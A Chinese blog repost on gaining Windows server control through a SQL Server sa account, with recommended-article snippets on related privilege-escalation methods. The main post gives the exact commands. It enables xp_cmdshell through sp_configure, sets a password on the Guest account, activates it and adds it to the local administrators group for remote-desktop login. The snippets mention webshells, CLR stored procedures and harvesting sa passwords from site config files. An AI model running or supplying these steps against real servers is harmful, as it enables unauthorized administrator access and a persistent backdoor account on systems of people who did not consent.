一次利用MSSQL的SA账户提权获取服务器权限

最新推荐文章于 2024-07-12 14:26:59 发布
最新推荐文章于 2024-07-12 14:26:59 发布
阅读量446 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/ixysy/p/4988533.html
版权

遇到小人,把服务器整走了

自己手里只有sql server的sa账号密码

模糊记起之前用这个账户提权读取文件的事

百度之,发现相关信息一堆堆

各种工具也用了不少 发现不是语法错误就是权限不够

无奈之下装了sql server r2直接来操作

顺利连接上去,看到有master这个库。

直奔重点去

这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各种牛逼的方法去禁止普通用户使用它

尝试用正常的方法打开xp_cmdshell:

EXEC sp_configure 'show advanced options', 1; 
RECONFIGURE; 
EXEC sp_configure 'xp_cmdshell', 1; 
RECONFIGURE; 
exec sp_configure

  

看来运气还是不错滴,xp_cmdshell顺利打开了。然后就可以直接执行cmd命令了:

exec xp_cmdshell ' net user Guest Qwer123456789'
exec xp_cmdshell ' net user Guest /active:yes'
exec xp_cmdshell 'net localgroup administrators Guest /add'

算是顺利

没什么障碍

最后附上一张远程登录的截图

转载于:https://www.cnblogs.com/ixysy/p/4988533.html

weixin_30546933
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlserver提权失败_mssql提权遇到CreateProcess' 失败,错误代码: '5'。
weixin_39897267的博客
12-23 1454
方法一:mssql 数据库注入时 exec xp_cmdshell 调用 'CreateProcess' 失败的解决办法。微软ms sql 2000/2005 注入时exec xp_cmdshell 调用 'CreateProcess' 失败,错误代码: '5',两种解决办法。原因不说了,一般都是cmd.exe被限制权限了,system用户权限,解决方法2种:1、替换shift文件(在开启33...
服务器管理员账号sa,一次利用MSSQLSA账户提权获取服务器权限
weixin_39542742的博客
07-29 935
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssqlsa权限下的提权利器,不过有经验的管理员一般都会用各...
SA提权
weixin_33946020的博客
01-23 245
遇到一个SA注入点,拿到了webshell 注入点可以直接执行命令 开了3389,能连接上 问题是始终加不上用户! net user命令可以执行 net user test test /add 提示“拒绝访问”! net user user pass 想更改用户密码或者添加用户的时候 就会提示“拒绝访问” 上传过本地的cmd.exe、net.exe、net...
SQLserver提权
一个普普通通的博客
04-17 2908
SQLserver提权
SQlserver提权方法
good good study
05-24 2056
sql server提权执行命令)主要依赖于sql server自带的存储过程。目的:sqlserver权限 —> 系统权限存储过程是一个可编程的函数,它在数据库中创建并保存,是存储在服务器中的一组预编译过的T-SQL语句。数据库中的存储过程可以看做是对编程中面向对象方法的模拟。它允许控制数据的访问方式(可以将存储过程理解为函数调用的过程),使用execute命令执行存储过程。主要分为系统存储过程、扩展存储过程、用户自定义的存储过程三大类。
SQL Server 数据库提权的几种方法——提权教程
热门推荐
W小哥
01-20 1万+
一、简介 在利用系统溢出漏洞有效果的情况下,可以采用数据库进行提权数据库提权的前提条件: 1、服务器开启数据库服务 2、获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提权的可能) 二、使用xp_cmdshell进行提权 xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重新开启它。 启用: EXEC sp_configure ‘show advanced opti
SQL Server手工注入方式
good good study
01-04 5656
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
MongoDB系列教程(四):设置用户访问权限
09-10
在MongoDB的默认安装中,数据库是允许匿名访问的,这意味着任何用户都可以无需身份验证就连接到MongoDB服务器,这显然不是一种安全的做法。因此,我们需要手动设置用户访问权限,防止未经授权的访问。 首先,我们...
Navicat远程连接SQL Server并转换成MySQL步骤详解
09-09
1. 在Navicat中新建SQL Server连接,输入远程服务器的IP地址,使用sa账户和设置的密码进行SQL Server验证,进行连接测试。 **四、数据转换至MySQL** 1. 确保本地已安装并配置好MySQL数据库。 2. 在Navicat中新建...
webshell提权教程.doc
06-26
服务器上搜索包含`conn`、`config`、`pass`等关键词的文件,可能能发现SQL Server的sa账户或MySQL的相关密码,从而获取数据库权限,这可能进一步帮助提升系统权限。 5. **利用FlashFXP**: FlashFXP是一种FTP...
mssql数据库提权之——xp_cmdshell执行系统命令
01-19
条件 所谓利用数据进行提权利用的其实是数据库的运行权限,所以只要我们满足以下条件即可进行提权: 1、 必须获得sa的账号密码或者与sa相同权限的账号密码,且mssql有被降权。 2、 必须可以以某种方式执行sql语句,例如:webshell或者是1433端口的连接。 提权基本思路过程与原理 1.MSSQL在Windows server类的操作系统上,默认具有system权限。System权限在Windows server2003中权限仅比管理员小;而在2003以上的版本,则为最高权限。 2.获取webshell之后可尝试在服务器各个站点的目录寻找sa的密码(某些站点直接在web应用程序中使
sqlserver 多库查询 sp_addlinkedserver使用方法(添加链接服务器
12-15
SQL Server中,`sp_addlinkedserver` 是一个系统存储过程,用于添加一个链接服务器,使得用户可以从一个SQL Server实例查询或操作另一个SQL Server实例的数据,实现跨服务器的数据交互。这个功能对于多库查询和...
IIS全通教程下载 站点绑定域名教程 MYSQL5教程 PHP环境教程
04-10
通过绑定域名,你可以将多个网站在同一台服务器上运行,每个网站对应不同的域名,实现资源的有效利用和管理。 【MYSQL5教程】 MySQL是一种广泛应用的关系型数据库管理系统,以其开源、免费和高性能著称。MySQL5教程...
SQL Server提权系列
2301_77152761的博客
04-11 225
CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。3、设置项目属性,目标平台修改为需要的目标平台,如SQL Server 2012;6、填入代码以后进行编译,之后到编译目录下可以看到一个dacpac后缀的文件。4、右键项目,选择添加->新建项,新建SQL CLR C# 存储过程。7、双击此文件进行解压,将解压出一个名为mode.sql的文件。
SQL Server 数据库常见提权总结
m0_64481831的博客
03-28 1868
前面总结了linux和Windows的提权方式以及Mysql提权,这篇文章讲讲SQL Server数据库提权
mssql提权总结
st3pby的博客
12-30 2654
mssql提权总结
渗透综合靶场---SqlServer提权
q
12-22 1053
再次查询是否开启3389端口,已开启就使用mstsc连接----exec xp_cmdshell'netstat -ant | find "3389"'查看目标是否开启3389端口----exec xp_cmdshell'netstat -ant | find "3389"'如何找到上传的文件所在目录,使用burp抓包点击文件,然后修改文件名,然后再放包,浏览器因为找不到文件会报错。扫描端口,知道目标ip,扫描目标ip开启了多少端口,(1-65535) 扫描出下面端口。
set user & password for database 设置数据库 用户和密码
最新发布
DavidsonGong的博客
07-12 106
USE sbms;
内网渗透测试:MySql利用提权思路总结1
08-03
渗透测试人员可以通过利用MySQL的一些漏洞或弱密码来实现提权,从而获取更高的权限,甚至控制整个目标系统。 值得注意的是,在MySQL渗透测试中,渗透测试人员还需要了解一些MySQL的0day漏洞。0day漏洞是指尚未被...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值